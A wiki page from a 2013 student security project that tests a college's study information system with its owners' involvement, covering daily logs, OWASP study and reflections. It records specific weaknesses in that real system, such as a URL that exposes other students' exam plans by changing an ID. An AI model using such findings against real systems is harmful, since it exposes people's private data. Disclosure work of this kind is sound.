		<id>https://wiki.itcollege.ee/index.php?title=Security&amp;diff=62414</id>
		<title>Security</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Security&amp;diff=62414"/>
		<updated>2013-04-05T08:41:02Z</updated>

		<summary type="html">&lt;p&gt;Saus: /* Feedback from Kęstutis Tautvydas */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Team page for [[Deploying IT Infrastructure Solutions]].&lt;br /&gt;
&lt;br /&gt;
==Team Members==&lt;br /&gt;
*Sten Aus, Estonian Information Technology College&lt;br /&gt;
*Matis Palm, Estonian Information Technology College&lt;br /&gt;
*Sandra Suviste, Estonian Information Technology College&lt;br /&gt;
*Markus Rintamäki, Vaasa University of Applied Sciences&lt;br /&gt;
*Tomas Lepistö, Vaasa University of Applied Sciences&lt;br /&gt;
*Mika Salmela, Vaasa University of Applied Sciences&lt;br /&gt;
*Kęstutis Tautvydas, Vilnius University of Applied Sciences&lt;br /&gt;
*Jurij Lukjančikov, Vilnius University of Applied Sciences&lt;br /&gt;
&lt;br /&gt;
==Goal==&lt;br /&gt;
*OWASP top 10&lt;br /&gt;
*HACK DVWA&lt;br /&gt;
*BackTrack, SamuraiCD (Last year experience)&lt;br /&gt;
*Scanning and testing tools  - Qualys SSL Labs&lt;br /&gt;
*Acunetix Web Vulnerability Scanner v.8&lt;br /&gt;
*SubGraph Vega&lt;br /&gt;
*BEAST attack&lt;br /&gt;
*RC4&lt;br /&gt;
&lt;br /&gt;
==Activity==&lt;br /&gt;
===Monday - 25.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Lectures&lt;br /&gt;
* Sumorobot programming&lt;br /&gt;
* Dinner @ St Patricks&lt;br /&gt;
&lt;br /&gt;
===Tuesday - 26.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Documentation!&lt;br /&gt;
A1 Injection - &amp;lt;b&amp;gt; Sandra &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A2 Broken Authentication and Session Management (was formerly A3) - &amp;lt;b&amp;gt; Kestutis &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A3 Cross-Site Scripting (XSS) (was formerly A2) - &amp;lt;b&amp;gt; Kestutis &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A4 Insecure Direct Object References - &amp;lt;b&amp;gt; Markus &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A5 Security Misconfiguration (was formerly A6)- &amp;lt;b&amp;gt; Tomas &amp;lt;/b&amp;gt; &lt;br /&gt;
&lt;br /&gt;
A6 Sensitive Data Exposure (merged from former A7 Insecure Cryptographic Storage and former A9 Insufficient Transport Layer Protection) - &amp;lt;b&amp;gt; Mika &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A7 Missing Function Level Access Control (renamed/broadened from former A8 Failure to Restrict URL Access) - &amp;lt;b&amp;gt; Sten &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A8 Cross-Site Request Forgery (CSRF) (was formerly A5) - &amp;lt;b&amp;gt; Matis &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A9 Using Known Vulnerable Components (new but was part of former A6 – Security Misconfiguration) - &amp;lt;b&amp;gt; Jurij &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A10 Unvalidated Redirects and Forwards - &amp;lt;b&amp;gt; Sten &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Still need to get everyone a VM with DVWA running&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Copy Paste documentation tasks to Wiki :)&lt;br /&gt;
* Divide OWASP tasks&lt;br /&gt;
&lt;br /&gt;
===Wednesday - 27.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Meeting with clients. It was very open-minded meeting. We got to know more about requirements.&lt;br /&gt;
* Analysing the user needs. We discussed face to face with our client and mentor (Margus Ernits) what needs to be done in order to perform security testing. Also, we found some tools from the Internet, which we can use for testing purposes.&lt;br /&gt;
* We divided roles and shared our areas of competences. Also, we agreed that one should not be doing always the same thing, so we can share our work with eachother.&lt;br /&gt;
* Estonian ICT Presentation and Wireshark practice. Wireshark was more-less known for everyone in our team. Despite that fact, we all found something enjoyable and new from Antti&#039;s presentation and Wireshark.&lt;br /&gt;
* Estonian members made Study Information System presentation to Finnish and Lithuanians. We talked about some potential vulnerabilities (such as VÕTA declaration, file upload, sending messages, voting system)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* As none of us have done security testing before, we have a lot to learn before we can actually do something. But I think with such a team as we are, it&#039;s nothing.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Estonian members are going to study last year&#039;s report and going to make a short overview to other members about it.&lt;br /&gt;
* We are going to study OWASP Top 10 vulnerabilities and everyone of us is going to make a short presentation to others about what they have learned.&lt;br /&gt;
* We are going to ask in demo (development) environment if they can open a new survey for us, new declaration period; Also we need teacher and demo accounts, in order to test teacher&#039;s side as well, because teachers have a little more access than students (grades, information about student etc).&lt;br /&gt;
* In demo environment we are going to test new functions (what haven&#039;t been included in main environment, yet) - as there&#039;s some new functionality.&lt;br /&gt;
&lt;br /&gt;
===Thursday - 28.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* OWASP TOP 10 presentations: Everybody presented on their subjects + discussion ([[#Materials_.28slides_etc.29|slides]])&lt;br /&gt;
* Discussed the schedule and to-do list for next days&lt;br /&gt;
* Discussed some potential vulnerabilities of SIS&lt;br /&gt;
* Made shared Googledoc to document the testing and to exchange information. Also we made Skype group in order to share files effectively and fast.&lt;br /&gt;
* Prepared software for testing (Backtrack, Kali)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* There is a lot of information, we need to focus on something and just start. There is no such thing as start-line (&amp;quot;Start here and go this way&amp;quot;), we will just need to start and see what we will find. &lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Find attack examples for the vulnerabilities&lt;br /&gt;
* Try them out on DVWA&lt;br /&gt;
* Get familiar with Tamper Data, Kali and Backtrack&lt;br /&gt;
* Familiarise ourselves with XSS, Injection, CSRF before testing SIS&lt;br /&gt;
* See how to get authentication info from POST and GET&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Security threat of a day&#039;&#039;&#039;&lt;br /&gt;
* There are three environments of SIS. Live, demo and developer. We found out that developer environment is accesible with our live users and passwords. What&#039;s more -&amp;gt; developer environment has LIVE data!!! Like! Does that ring any bell to you? NEVER, we mean like NEVER use live data (data, grades, schedule, students, personal ID-s etc) in demo/developer environment!&lt;br /&gt;
&lt;br /&gt;
===Friday - 29.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Learned how to perform attacks. We learned different attack methods and tried them out.&lt;br /&gt;
* Learned how to use different automated tools. Automated tools are not very efficient to SIS, but still - there might pop up something interesting from the results. Results are saved for later analysis.&lt;br /&gt;
* Talked about last year&#039;s experience. Tried if most of the security holes are patched or not.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* We need student access to developer environment&lt;br /&gt;
* We need new survey and declaration period opened (we asked Margus, he promised to give our request to someone who can make it)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Analysis of the results needs to be done&lt;br /&gt;
* Learn a little bit more about attacks&lt;br /&gt;
* Create some attacks&lt;br /&gt;
* Start to test simpler attacks to SIS&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Security threats of the day:&#039;&#039;&#039;&lt;br /&gt;
* One can see other student&#039;s exam plan just by chaning student_id value in the URL (you don&#039;t need to be logged in). You cannot see his/her name directly, but according to security holes now: See the schedule, just change ID - you get the name. Or if you are logged in, then you can go to &amp;quot;My data&amp;quot; and just change ID from the URL again.&lt;br /&gt;
&#039;&#039;For example: https://itcollege.dev.ois.ee/en/schedule/agenda?student_id=2322&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
===Saturday - 30.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Visiting Tallinn TV Tower&lt;br /&gt;
* Visitinig The Seaplane Harbour&lt;br /&gt;
&lt;br /&gt;
===Sunday - 31.03.13===&lt;br /&gt;
&#039;&#039;&#039;Free day&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
===Monday - 01.04.13===&lt;br /&gt;
&#039;&#039;&#039;NB! April fools&#039; day!&#039;&#039;&#039; Beware!&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* We analyzed student information fields in &amp;quot;My data&amp;quot; section&lt;br /&gt;
* We test different sections and tried to change user IDs - luckily these are safe now.&lt;br /&gt;
* Tried to use HTTP for different areas in SIS. Luckily, everything is forced to HTTPS.&lt;br /&gt;
* Study materials testing. If study materials are available to everyone (public), then it is possible to download them from HTTP and/or HTTPS!&lt;br /&gt;
* Tried reflected XSS, most SIS areas escape &amp;quot;bad characters&amp;quot; out from input boxes.&lt;br /&gt;
* As the SIS allows academicians (lecturers) to change their picture, we tried to insert some malicious code into picture. Scenario was that when someone opens the picture, some bad things will happen. This did not work in SIS. Students are not allowed to change their picture due to security reasons &#039;&#039;(for example: other person taking exams claiming he/she is someone he/she is not)&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Still no new declaration etc opened for us. Maybe tomorrow?&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* We strongly hope that there will be new declaration period, survey, scolarship application and VÕTA opened for us for tomorrow morning, because we could test them as well and we don&#039;t have much time left.&lt;br /&gt;
* Go deeper with different attacks and methods.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Security threat&#039;s of the day:&#039;&#039;&#039;&lt;br /&gt;
* SIS (Study Information System) is vulnerable to BEAST attack, because it uses RC4 encryption algorithm in SSL. We as a test-team are not capable to perform this kind of attack, thus we cannot test how far can we go, but this is a threat to whole system. BEAST attack can sniff authorized user&#039;s cookies and then grant access to attacker.&lt;br /&gt;
* There&#039;s no character limit for input fields (search, names). This can lead to DOS-attack because attacker can send multiple requests with long URLs and then server freezes.&lt;br /&gt;
* Calendar: there&#039;s no limit or check if user have just typed numbers. Error is rendered back to user, but it is escaped.&lt;br /&gt;
* There are some developer&#039;s notes left in different SIS parts (not only in developer environment).&lt;br /&gt;
&lt;br /&gt;
===Tuesday - 02.04.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Visiting Skype office.&lt;br /&gt;
* Learning the principles of good presentation to put into practice tomorrow and on Thursday.&lt;br /&gt;
* SIS is using a field called &amp;quot;security_key_sis_global&amp;quot;. This form value does not change and is based on user data. We have found out that this does not change even on change of password, so that means, this has to be calculated from person&#039;s name and/or username and/or personal ID code and/or user_id value. We have assumption that this is a SHA1 hash, as it is 40 characters long. Maybe salted, maybe not? Anyway, this could be a threat to SIS in long term perspective.&lt;br /&gt;
* Studied the OWASP ASVS (Application Security Verification Standard) with SIS in mind. Marked the requirements we can not check for (because we do not have the source code etc), the requirements we believe are met and those that need further testing.&lt;br /&gt;
*Got the chance to insert a new VÕTA (APEL) request that also allows for uploading files. This is interesting because it might be possible to upload a file containing malicious code.&lt;br /&gt;
*The SIS does not ask for password when changing the personal e-mail address. This is a risk, because this is the mail address SIS sends a password reset link to if the user clicks on &amp;quot;Forgot my password&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Really would have liked to have more time to test.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Prepare and rehearse the presentation&lt;br /&gt;
* Look further into the e-mail modification issue.&lt;br /&gt;
* Finalise ASVS review&lt;br /&gt;
&lt;br /&gt;
===Wednesday - 03.04.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Studied and analysed ASVS. Went through requirements and aspects about web application security, analysed what applies to SIS and what not.&lt;br /&gt;
* We learned and practiced public presentation. Discussed structure and divided roles. Rehearsed presentation to &amp;quot;audience&amp;quot;.&lt;br /&gt;
* SIS testing (security token), javascript upload, tried to find XSS vulnerabilities in APEL (VÕTA) application and file upload areas etc.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Lack of time. Doing presentation and rehersal took so much time which could be used for testing SIS. Also, testing SIS took so much time, which again could be have been used for rehearsal.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* We want to review and rehearse our final presentation.&lt;br /&gt;
* Update our documentation in Wiki.&lt;br /&gt;
* Upload and link presentations to persons and fill gaps in documentation.&lt;br /&gt;
&lt;br /&gt;
===Thursday - 04.04.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Dress rehearsal. Updated presentation according to feedback and capabilities.&lt;br /&gt;
* Updated documentation to Wiki and uploaded missing presentations.&lt;br /&gt;
* Personal input section filling in Wiki.&lt;br /&gt;
* Went bowling. :)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Sometimes one minute feels like it is not a minute. :)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Final documentation (link to Google docs).&lt;br /&gt;
* IP feedback&lt;br /&gt;
* Summarisation&lt;br /&gt;
&lt;br /&gt;
===Friday - 05.04.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Discussion about today&#039;s plans.&lt;br /&gt;
* Upgraded and linked final documentation from Google Drive (aka Google Docs) (link can be found in Materials[[#Materials_.28slides_etc.29]] section and [[#Final documentation]] section).&lt;br /&gt;
* Every member wrote a feedback to Wiki page&lt;br /&gt;
* Every member wrote a feedback according to requirements of the Intensive Programme (Erasmus feedback)&lt;br /&gt;
* IP summarisation.&lt;br /&gt;
* Farewell party at St. Patrick&#039;s.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Farewell party, sleep well and start trip to home! :)&lt;br /&gt;
&lt;br /&gt;
===Saturday - 06.04.13===&lt;br /&gt;
&#039;&#039;&#039;Departure! Bye bye!&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
==Materials (slides etc)==&lt;br /&gt;
* &#039;&#039;&#039;Slides about OWASP (Open Web Application Security Project) TOP 10 what we performed to eachother&#039;&#039;&#039;&lt;br /&gt;
** TOP 10 list [[Media:OWASP_Top_10_-_2013_-_RC1.pdf‎]]&lt;br /&gt;
** A1 Injection [[Media:2013_security_a1.pdf]] (Made by: Sandra)&lt;br /&gt;
** A2 Broken Authentication and Session Management [[Media:2013_security_a2.pdf]] (Made by: Kęstutis)&lt;br /&gt;
** A3 Cross-Site Scripting (XSS) [[Media:2013_security_a3.pdf]] (Made by: Kęstutis)&lt;br /&gt;
** A4 Insecure Direct Object References [[Media:2013_security_a4.pdf]] (Made by: Markus)&lt;br /&gt;
** A5 Security Misconfiguration [[Media:2013_security_a5.pdf]] (Made by: Tomas)&lt;br /&gt;
** A6 Sensitive Data Exposure [[Media:2013_security_a6.pdf]] (Made by: Mika)&lt;br /&gt;
** A7 Missing Function Level Access Control [[Media:2013_security_a7.pdf]] (Made by: Sten)&lt;br /&gt;
** A8 Cross-Site Request Forgery (CSRF) - was covered in A1&lt;br /&gt;
** A9 Using Known Vulnerable Components [[Media:2013_security_a9.pdf]] (Made by: Jurij)&lt;br /&gt;
** A10 Unvalidated Redirects and Forwards [[Media:2013_security_a10.pdf]] (Made by: Sten)&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Day summarisation:&#039;&#039;&#039;&lt;br /&gt;
** Slides presented on the 28th of March day summarization. [[Media:2013 security presentation 28 03.pdf]]&lt;br /&gt;
** Slides presented on the 01st of April day summarization. [[Media:2013_security_presentation_01_04.pdf]]&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Security teamwork (whiteboard):&#039;&#039;&#039;&lt;br /&gt;
** Whiteboard 27.03 [[Media:Security team 2013-03-27.jpg]]&lt;br /&gt;
** Whiteboard 28.03 [[Media:security_2013_picture_2803.JPG]]&lt;br /&gt;
** Whiteboard 29.03 [[Media:security_2013_picture_2903.JPG]]&lt;br /&gt;
** Whiteboard 01.04 [[Media:security_2013_picture1.JPG]]&lt;br /&gt;
** Whiteboard 02.04 [[Media:security_2013_picture_0204.JPG]]&lt;br /&gt;
** Whiteboard 03.04 [[Media:2013_security_presentation_structure.jpg]] (Discussion about final presentation)&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Virtual Machines (VM VirtualBox .ova files):&lt;br /&gt;
** [http://elab.itcollege.ee:8000/security_team.ova Virtual Machine with Apache, MySQL, DVWA]&lt;br /&gt;
** [http://elab.itcollege.ee:8000/BT5R2.ova Virtual Machine with Backtrack]&lt;br /&gt;
** [http://elab.itcollege.ee:8000/kali-64bit.ova Virtual Machine with Kali Linux]&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Final presentation of the project to the clients (4 April 2013)&#039;&#039;&#039;&lt;br /&gt;
** [[Media:2013_security_final_presentation.pdf|Presentation slides]] &#039;&#039;(Made by whole team, structure by Sandra and Jurij)&#039;&#039;&lt;br /&gt;
** [http://echo360.e-uni.ee/ess/echo/presentation/d465007c-1582-4e58-ae0f-c7a2aa9af988 Video from echo360] &#039;&#039;(Team Security starts from 18:30)&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Final documentation&#039;&#039;&#039;&lt;br /&gt;
** Can be found in Google Drive (link will be here soon).&lt;br /&gt;
&lt;br /&gt;
==Results==&lt;br /&gt;
Summary of what we did and solution what we developed&lt;br /&gt;
&lt;br /&gt;
===Personal input===&lt;br /&gt;
====Sten Aus====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** I was selected as a group leader (project manager) on the first day (25 March). We decided also that this is a democracy not a tyranny. :)&lt;br /&gt;
** Helped others to use different kind of tools (Apache, Linux, DVWA, Wordpress etc, as I have dealt with them before (subjects in college with Margus, pre-school experience).&lt;br /&gt;
** Presentations to each other about OWASP TOP 10 ([[Media:2013_security_a7.pdf|A7 - Missing Function Level Access Control]] and [[Media:2013_security_a10.pdf|A10 - Unvalidated Redirects and Forwards]]).&lt;br /&gt;
** Demos about SIS vulnerabilities in different presentations (to group members, other participants and audience).&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I learned:&#039;&#039;&#039;&lt;br /&gt;
** How to do documentation? I have documented my work before as well, but in such a big group as we had, it was first time experience for me.&lt;br /&gt;
** I learned how big value &amp;quot;same day feedback and summarisation&amp;quot; has.&lt;br /&gt;
** What security threats are out there and how to protect yourself (and your systems) against them. I have already taken different security measures into account in many web applications what I am using (or administering).&lt;br /&gt;
&lt;br /&gt;
====Matis Palm====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** Helped teaching Apache &amp;amp; Linux &amp;amp; DVWA to other participants (due to having some experience already from before).&lt;br /&gt;
** Helping with sumorobot programming (Being from the robotics club).&lt;br /&gt;
** I helped to push the team in some direction at start, because no-one had previous experience and I was here last year on the Intensive Programme with the previous Security team.&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039; What I learned:&#039;&#039;&#039;&lt;br /&gt;
** Learned alot about how to use and search information for security testing (XSS, CSRF and so on).&lt;br /&gt;
** I learned about ASVS and OWASP and a few tools used for testing (e.g. TamperData, InjectMe XSS and CSRF and so on).&lt;br /&gt;
&lt;br /&gt;
====Sandra Suviste====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** Researched and presented vulnerability No 1 from the OWASP Top 10 list - Injection ([[Media:2013_security_a1.pdf|A1 - Injections]]).&lt;br /&gt;
** Practised attacks on the DVWA.&lt;br /&gt;
** Went through the OWASP ASVS document for possible shortcomings of the SIS.&lt;br /&gt;
** Tested the SIS for vulnerabilities, mostly SQL and XSS injections - both in web forms and in the URL.&lt;br /&gt;
** Documented my own and others&#039; work.&lt;br /&gt;
** Together with Jurij we were responsible for the final presentation structure ([[Media:2013_security_final_presentation.pdf|Final presentation slides]]). &lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I learned:&#039;&#039;&#039;&lt;br /&gt;
** A lot about web application vulnerabilities - from my own research &amp;amp; practice and from others&#039; presentations and teachers&#039; lectures.&lt;br /&gt;
** Became more experienced in working in a multinational group with English as the working language.&lt;br /&gt;
** I learned how to document my work in order to keep track of the work of the team.&lt;br /&gt;
** I also learned what are the issues connected to the preparing of and giving a presentation with several (&amp;gt;3) presenters.&lt;br /&gt;
&lt;br /&gt;
====Markus Rintamäki====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** OWASP TOP 10 presentations to each other ([[Media:2013_security_a4.pdf|A4 - Insecure Direct Object References]]).&lt;br /&gt;
** Different attacks on SIS, changing user ids, SQL injection and XSS.&lt;br /&gt;
** Tried to upload a picture (for a lecturer) infected with malicious .php code.&lt;br /&gt;
** I also used a tool in Backtrack to decrypt the token that we found. This was also unsuccessful.&lt;br /&gt;
** We made the presentation structure together.&lt;br /&gt;
** Googeled a lot :)&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I learned:&#039;&#039;&#039;&lt;br /&gt;
** My knowledge in hacking a real system before this course was close to a zero. I had to learn the basic attack methods and so I did.&lt;br /&gt;
** Basic attack methods in DVWA: SQL injection, XSS and CSRF. &lt;br /&gt;
** What is SIS and how does it works?&lt;br /&gt;
** I also learned to program sumorobots, more about Linux and Wireshark.&lt;br /&gt;
** And also of course I learned to speak english more fluently. :)&lt;br /&gt;
&lt;br /&gt;
====Tomas Lepistö====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** Tried to find out possible security holes from OIS site.&lt;br /&gt;
** Tested different attacking methods with DVWA&lt;br /&gt;
** SQL-injection tests into various places on OIS site.&lt;br /&gt;
** Tested some XSS methods&lt;br /&gt;
** OWASP TOP 10 presentation to each other ([[Media:2013_security_a5.pdf|A5 - Misconfigured Configuration]]).&lt;br /&gt;
** Prepared our presentation with other group members&lt;br /&gt;
** Spoke in daily summary&lt;br /&gt;
** Studied a lot of information to know what is hacking about?&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What i learned:&#039;&#039;&#039;&lt;br /&gt;
** I learned how to use SQL-injection, XSS, Brute force, CSRF&lt;br /&gt;
** I learned also how to use Kali,Backtrack,Temper data, DVWA&lt;br /&gt;
** Working in international group&lt;br /&gt;
** How important documentation is&lt;br /&gt;
** Found out how important it is to make web-application secure&lt;br /&gt;
&lt;br /&gt;
====Mika Salmela====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** I studied hacking methods&lt;br /&gt;
** Tried some hacking methods with DVWA&lt;br /&gt;
** Iscanned website, try to find if there is some security risks&lt;br /&gt;
** Tried some SQL and XSS injections&lt;br /&gt;
** OWASP TOP 10 presentations to each other [[Media:2013_security_a6.pdf|(A6 - Sensitive Data Exposure]]).&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I learned:&#039;&#039;&#039;&lt;br /&gt;
** More than basics of how to hack?&lt;br /&gt;
** The most common hacking methods and how to use them.&lt;br /&gt;
** How to do SQL and XSS injections&lt;br /&gt;
** Basics of hacking tools&lt;br /&gt;
** How to find security risks&lt;br /&gt;
** How to work in international team.&lt;br /&gt;
** Learned much about what these are: DVWA, OWASP and ASVS.&lt;br /&gt;
&lt;br /&gt;
====Kęstutis Tautvydas====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** OWASP TOP 10 presentations to each other ([[Media:2013_security_a2.pdf|A2 - Broken Authentication and Session Management]] and [[Media:2013_security_a3.pdf|A3 - Cross-Site Scripting (XSS)]]).&lt;br /&gt;
** Searched for security holes in OIS student information site.&lt;br /&gt;
** Used DVWA tool to test sql injections and xss scripting.&lt;br /&gt;
** Tried some sql injections and xss scripting on OIS page&lt;br /&gt;
** Made presentations about broken authentication and session management and cross-site scripting and introduced them to my team mates&lt;br /&gt;
** Prepared some slides for the main presentation&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What have I learned:&#039;&#039;&#039;&lt;br /&gt;
** Theory about OWASP TOP 10 threats&lt;br /&gt;
** How to do sql injections&lt;br /&gt;
** How to use Firefox tamperdata tool&lt;br /&gt;
** How to do cross-site scripting&lt;br /&gt;
** Completely understood what is use case and how to draw them&lt;br /&gt;
** How to monitor activities with Wireshark&lt;br /&gt;
** How to do a scan of web site vulnerability using Acunetix Web Vulnerability Scanner 8&lt;br /&gt;
&lt;br /&gt;
====Jurij Lukjančikov====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** OWASP TOP 10 presentation to each other ([[Media:2013_security_a9.pdf|A9 - Using Known Vulnerable Components]])&lt;br /&gt;
**  I and Sandra were responsible for the final presentation structure ([[Media:2013_security_final_presentation.pdf|Final presentation slides]])&lt;br /&gt;
** XSS and injection attacks to SIS&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What have I learned:&#039;&#039;&#039;&lt;br /&gt;
** I have learned about security breaches on the web.&lt;br /&gt;
** I have tried different parts of web for vulnerabilities and injection.&lt;br /&gt;
** Together with team learned how to make injection and XSS attacks using Linux (Linux was unfamiliar for me before that).&lt;br /&gt;
&lt;br /&gt;
===Final documentation===&lt;br /&gt;
====Analysis====&lt;br /&gt;
&lt;br /&gt;
====Solution====&lt;br /&gt;
&lt;br /&gt;
==IP Feedback==&lt;br /&gt;
===Feedback from Sten Aus===&lt;br /&gt;
I liked IP very much. It was very mindopening experience and definitely I am going to suggest this to my friends, so they can participate next time. I think that it is very good to participate in multicultural group, where all the participants are from different countries.&lt;br /&gt;
I did not like that we had to sit so much in lectures. :) And from time to time it was hard to understand the meaning of lecture, I could not link it to our project. But I think it will come to me after a few days, months or years, as a lot in this life - you don&#039;t know the purpose yet, but you will find it out in the future.&lt;br /&gt;
&lt;br /&gt;
I enjoyed food a lot, it was a good choice to take lunches and dinners from Rahva Toit. :) Also, the pricing was good.&lt;br /&gt;
&lt;br /&gt;
I enjoyed out-of-schedule activities. For example, I liked visiting TV tower and Seaplane Harbour. I have been to TV tower before, but still it was very enjoyable experience. Also, I appreciate that Sander organized pool and bowling. Despite the fact I could not participate in pool, I was in bowling &amp;quot;competition&amp;quot; and it was fun!&lt;br /&gt;
&lt;br /&gt;
===Feedback from Matis Palm===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Sandra Suviste===&lt;br /&gt;
* &#039;&#039;&#039;What I did like:&#039;&#039;&#039;&lt;br /&gt;
** Working in a team on a real-life problem.&lt;br /&gt;
** Practising problem-solving and working as a team.&lt;br /&gt;
** Learned a lot of new stuff.&lt;br /&gt;
** Organisation - well done&lt;br /&gt;
** Had a wonderful team!&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I did not like:&#039;&#039;&#039;&lt;br /&gt;
** A couple of days short of time - as usual...&lt;br /&gt;
&lt;br /&gt;
===Feedback from Markus Rintamäki===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Tomas Lepistö===&lt;br /&gt;
* &#039;&#039;&#039;What I did like:&#039;&#039;&#039;&lt;br /&gt;
** It was nice to meet new people and get new friends from different cultures.&lt;br /&gt;
** Also all the events that was arranged were very funny, specially sauna-event!  &lt;br /&gt;
** Visiting Skype office was something that you don’t get to do everyday!&lt;br /&gt;
** Free food!&lt;br /&gt;
** Everything was well organized and teachers were truly interested about this intensive course!&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I did not like:&#039;&#039;&#039;&lt;br /&gt;
** Too long studying/working days.&lt;br /&gt;
&lt;br /&gt;
===Feedback from Mika Salmela===&lt;br /&gt;
* &#039;&#039;&#039;What I did like:&#039;&#039;&#039;&lt;br /&gt;
** First of all, i would like thank you everyone!&lt;br /&gt;
